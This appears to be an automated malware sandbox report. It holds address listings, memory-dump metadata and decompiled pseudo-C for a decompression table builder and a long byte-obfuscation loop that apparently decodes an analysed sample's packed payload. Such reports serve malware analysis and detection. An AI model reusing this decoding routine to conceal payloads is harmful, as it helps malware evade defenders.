                                            0x004065b9
                                            0x004065c0
                                            0x004065c4
                                            0x004065c6
                                            0x004065c9
                                            0x004065cc
                                            0x004065d1
                                            0x004065d4
                                            0x004065d6
                                            0x004065d7
                                            0x004065da
                                            0x004065e5
                                            0x004065e8
                                            0x004065ff
                                            0x00406604
                                            0x0040660b
                                            0x00406610
                                            0x00406614
                                            0x00406616
                                            0x00406616
                                            0x00406616
                                            0x00406619
                                            0x0040661b
                                            0x00000000
                                            0x00406621
                                            0x00406621
                                            0x00406625
                                            0x00406630
                                            0x00406643
                                            0x00406648
                                            0x0040664d
                                            0x0040664f
                                            0x00000000
                                            0x00000000
                                            0x00406655
                                            0x00406655
                                            0x00406658
                                            0x0040665a
                                            0x00406668
                                            0x00406668
                                            0x0040666b
                                            0x0040666b
                                            0x0040666e
                                            0x00406671
                                            0x00406674
                                            0x00406677
                                            0x0040667a
                                            0x0040667d
                                            0x00000000
                                            0x0040667d
                                            0x0040665c
                                            0x0040665c
                                            0x00406662
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406662
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406a01
                                            0x00406a01
                                            0x00406a07
                                            0x00406a0d
                                            0x00406a12
                                            0x00406a18
                                            0x00406a1e
                                            0x00406a20
                                            0x00406a23
                                            0x00406a2c
                                            0x00406a32
                                            0x00406a32
                                            0x00406a25
                                            0x00406a27
                                            0x00406a29
                                            0x00406a29
                                            0x00406a34
                                            0x00406a36
                                            0x00406a39
                                            0x00406a74
                                            0x00406a74
                                            0x00000000
                                            0x00406a3b
                                            0x00406a3b
                                            0x00406a3b
                                            0x00406a41
                                            0x00406a44
                                            0x00406a46
                                            0x00406a7b
                                            0x00406a7d
                                            0x00000000
                                            0x00406a7d
                                            0x00000000
                                            0x00406a46
                                            0x00000000
                                            0x00406085
                                            0x00406a53
                                            0x00000000
                                            0x00406a53
                                            0x00406467
                                            0x00406469
                                            0x00000000
                                            0x00000000
                                            0x0040646b
                                            0x0040646b
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x004063b3
                                            0x00406374
                                            0x00406a58
                                            0x00406a5b
                                            0x00406a5d
                                            0x00406a66
                                            0x00406a6c
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                            • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                                            • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                            • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406B2B, Relevance: .3, Instructions: 300COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ceb8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ceb8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                            0x00406b36
                                            0x00406b3e
                                            0x00406b42
                                            0x00406b44
                                            0x00406b47
                                            0x00406b49
                                            0x00406b49
                                            0x00406b4b
                                            0x00406b52
                                            0x00406b54
                                            0x00406b54
                                            0x00406b5a
                                            0x00406b6f
                                            0x00406b77
                                            0x00406b79
                                            0x00406b7b
                                            0x00406b7e
                                            0x00406b7f
                                            0x00406b7f
                                            0x00406b85
                                            0x00000000
                                            0x00000000
                                            0x00406b87
                                            0x00406b8a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406b8a
                                            0x00406b8e
                                            0x00406b91
                                            0x00406b93
                                            0x00406b93
                                            0x00406b96
                                            0x00406b9c
                                            0x00406b9d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406b9d
                                            0x00406ba2
                                            0x00406ba5
                                            0x00406ba7
                                            0x00406ba7
                                            0x00406bad
                                            0x00406baf
                                            0x00406bc0
                                            0x00406bb3
                                            0x00406bb7
                                            0x00406e5c
                                            0x00000000
                                            0x00406e5c
                                            0x00406bbd
                                            0x00406bbe
                                            0x00406bbe
                                            0x00406bc6
                                            0x00406bc9
                                            0x00406bcd
                                            0x00406bcf
                                            0x00406bd1
                                            0x00406bd4
                                            0x00000000
                                            0x00000000
                                            0x00406bdc
                                            0x00406be2
                                            0x00406be4
                                            0x00406be6
                                            0x00406be7
                                            0x00406bfc
                                            0x00406bfc
                                            0x00406bff
                                            0x00406c01
                                            0x00406c01
                                            0x00406c03
                                            0x00406c08
                                            0x00406c0a
                                            0x00406c11
                                            0x00406c13
                                            0x00406c1b
                                            0x00406c1b
                                            0x00406c1d
                                            0x00406c1e
                                            0x00406c2d
                                            0x00406c31
                                            0x00406c35
                                            0x00406c38
                                            0x00406c3b
                                            0x00406c40
                                            0x00406c43
                                            0x00406c49
                                            0x00406c50
                                            0x00406c56
                                            0x00406e4f
                                            0x00406e4f
                                            0x00406e54
                                            0x00406e63
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406e54
                                            0x00406c63
                                            0x00406c66
                                            0x00406c69
                                            0x00406c6c
                                            0x00406c70
                                            0x00000000
                                            0x00000000
                                            0x00406c7b
                                            0x00406c7e
                                            0x00406c7f
                                            0x00406c81
                                            0x00406c87
                                            0x00406c8a
                                            0x00000000
                                            0x00000000
                                            0x00406c90
                                            0x00406c91
                                            0x00406c94
                                            0x00406c97
                                            0x00406c9a
                                            0x00406ca0
                                            0x00406ca2
                                            0x00406ca2
                                            0x00406caa
                                            0x00406cae
                                            0x00406cb3
                                            0x00406cd8
                                            0x00406cde
                                            0x00406ce0
                                            0x00406ce2
                                            0x00406ce5
                                            0x00406cee
                                            0x00000000
                                            0x00000000
                                            0x00406cb5
                                            0x00406cb5
                                            0x00406cbe
                                            0x00406cc2
                                            0x00000000
                                            0x00000000
                                            0x00406cd3
                                            0x00406cd3
                                            0x00406cd6
                                            0x00000000
                                            0x00000000
                                            0x00406cc6
                                            0x00406cc9
                                            0x00406ccb
                                            0x00406ccf
                                            0x00000000
                                            0x00000000
                                            0x00406cd1
                                            0x00406cd1
                                            0x00000000
                                            0x00406cd3
                                            0x00406cf7
                                            0x00406cfd
                                            0x00406d07
                                            0x00406d09
                                            0x00406d0e
                                            0x00406d10
                                            0x00406d46
                                            0x00406d12
                                            0x00406d12
                                            0x00406d15
                                            0x00406d18
                                            0x00406d22
                                            0x00406d25
                                            0x00406d2c
                                            0x00406d37
                                            0x00406d3e
                                            0x00406d3e
                                            0x00406d48
                                            0x00406d4b
                                            0x00406d4d
                                            0x00406d53
                                            0x00406d53
                                            0x00406d5c
                                            0x00406d5f
                                            0x00406d64
                                            0x00406d73
                                            0x00406d7b
                                            0x00406d80
                                            0x00406da4
                                            0x00406dac
                                            0x00406db0
                                            0x00406db6
                                            0x00406d82
                                            0x00406d90
                                            0x00406d93
                                            0x00406d99
                                            0x00406d99
                                            0x00406dba
                                            0x00406d75
                                            0x00406d75
                                            0x00406d75
                                            0x00406dcb
                                            0x00406dcf
                                            0x00406ddb
                                            0x00406dd6
                                            0x00406dd9
                                            0x00406dd9
                                            0x00406de3
                                            0x00406de8
                                            0x00406df0
                                            0x00406dec
                                            0x00406dee
                                            0x00406dee
                                            0x00406df6
                                            0x00406df8
                                            0x00406dff
                                            0x00406e09
                                            0x00406e13
                                            0x00406e2f
                                            0x00406e33
                                            0x00406c78
                                            0x00406c7e
                                            0x00406c7f
                                            0x00406c81
                                            0x00406c87
                                            0x00406c8a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c8a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406e15
                                            0x00406e15
                                            0x00406e15
                                            0x00406e1a
                                            0x00406e23
                                            0x00406e2c
                                            0x00000000
                                            0x00406e2c
                                            0x00406e39
                                            0x00406e39
                                            0x00406e3c
                                            0x00406e43
                                            0x00406e46
                                            0x00000000
                                            0x00406c69
                                            0x00406be9
                                            0x00406beb
                                            0x00406beb
                                            0x00406bef
                                            0x00406bf2
                                            0x00406bf3
                                            0x00406bf3
                                            0x00000000
                                            0x00406beb
                                            0x00406b5f
                                            0x00406b65
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                            • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                            • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                            • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 72915CE2, Relevance: .2, Instructions: 239COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E72915CE2(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				signed int _v12;

				_v12 = _v12 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				while(_v12 < _a8) {
					_v5 =  *((intOrPtr*)(_a4 + _v12));
					_v5 = (_v5 & 0x000000ff) + 0xb9;
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x8c;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x000000ea;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 = (_v5 & 0x000000ff) - 0xa3;
					_v5 = _v5 & 0x000000ff ^ 0x000000a7;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x00000055;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x93;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x1d;
					_v5 = _v5 & 0x000000ff ^ 0x0000007e;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x000000bd;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = _v5 & 0x000000ff ^ 0x000000da;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x86;
					_v5 = _v5 & 0x000000ff ^ 0x0000007b;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x1f;
					_v5 = _v5 & 0x000000ff ^ 0x00000093;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) - 0xd;
					_v5 = _v5 & 0x000000ff ^ 0x00000068;
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x00000095;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x9b;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) - 0x44;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 = (_v5 & 0x000000ff) - 0xf9;
					_v5 = _v5 & 0x000000ff ^ 0x00000063;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x9f;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					 *((char*)(_a4 + _v12)) = _v5;
					_v12 = _v12 + 1;
				}
				return _a4;
			}





                                            0x72915ce7
                                            0x72915ceb
                                            0x72915cf8
                                            0x72915d0c
                                            0x72915d18
                                            0x72915d2b
                                            0x72915d34
                                            0x72915d40
                                            0x72915d49
                                            0x72915d52
                                            0x72915d5c
                                            0x72915d68
                                            0x72915d72
                                            0x72915d85
                                            0x72915d91
                                            0x72915d9d
                                            0x72915da6
                                            0x72915db0
                                            0x72915db9
                                            0x72915dc5
                                            0x72915dce
                                            0x72915dd8
                                            0x72915de2
                                            0x72915dec
                                            0x72915df8
                                            0x72915e02
                                            0x72915e0b
                                            0x72915e15
                                            0x72915e1f
                                            0x72915e31
                                            0x72915e3d
                                            0x72915e47
                                            0x72915e51
                                            0x72915e5a
                                            0x72915e66
                                            0x72915e70
                                            0x72915e7a
                                            0x72915e84
                                            0x72915e8e
                                            0x72915e9a
                                            0x72915eac
                                            0x72915eb6
                                            0x72915ec0
                                            0x72915ed3
                                            0x72915edc
                                            0x72915ee5
                                            0x72915eef
                                            0x72915efb
                                            0x72915f0d
                                            0x72915f17
                                            0x72915f23
                                            0x72915f2d
                                            0x72915f36
                                            0x72915f48
                                            0x72915f52
                                            0x72915f5b
                                            0x72915f64
                                            0x72915f6e
                                            0x72915f81
                                            0x72915f8d
                                            0x72915f97
                                            0x72915fa9
                                            0x72915fb3
                                            0x72915fbc
                                            0x72915fc8
                                            0x72915fd1
                                            0x72915fdb
                                            0x72915fe7
                                            0x72915cf5
                                            0x72915cf5
                                            0x72915ff4

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 861cc2c5085b229a084d8cea1f42d84464f19499e0e81406b93e6c087f9ff300
                                            • Instruction ID: f28884ef8ab71d89a1fd7ce99a738e2bdb2a0368fbd64f23d23bf78d129738cd
                                            • Opcode Fuzzy Hash: 861cc2c5085b229a084d8cea1f42d84464f19499e0e81406b93e6c087f9ff300
                                            • Instruction Fuzzy Hash: 85B1151485D2ECADDB06CBF984607FCBFB04E26102F0845DAE4E5E6283C53A934EDB25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 72915CF1, Relevance: .2, Instructions: 231COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E72915CF1() {
				void* _t326;

				L0:
				while(1) {
					L0:
					 *(_t326 - 8) =  *(_t326 - 8) + 1;
					L1:
					if( *(_t326 - 8) <  *((intOrPtr*)(_t326 + 0xc))) {
						L2:
						 *(_t326 - 1) =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 8)) +  *(_t326 - 8)));
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) + 0xb9;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t326 - 1) & 0x000000ff) << 0x00000005;
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) + 0x8c;
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) =  ~( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) +  *(_t326 - 8);
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x000000ea;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) +  *(_t326 - 8);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t326 - 1) & 0x000000ff) << 0x00000005;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) - 0xa3;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x000000a7;
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x00000055;
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) + 0x93;
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) + 0x1d;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x0000007e;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) +  *(_t326 - 8);
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x000000bd;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) +  *(_t326 - 8);
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) -  *(_t326 - 8);
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^  *(_t326 - 8);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t326 - 1) & 0x000000ff) << 0x00000001;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x000000da;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) -  *(_t326 - 8);
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^  *(_t326 - 8);
						 *(_t326 - 1) =  ~( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) + 0x86;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x0000007b;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) -  *(_t326 - 8);
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^  *(_t326 - 8);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) - 0x1f;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x00000093;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t326 - 1) & 0x000000ff) << 0x00000007;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) - 0xd;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x00000068;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t326 - 1) & 0x000000ff) << 0x00000002;
						 *(_t326 - 1) =  ~( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) +  *(_t326 - 8);
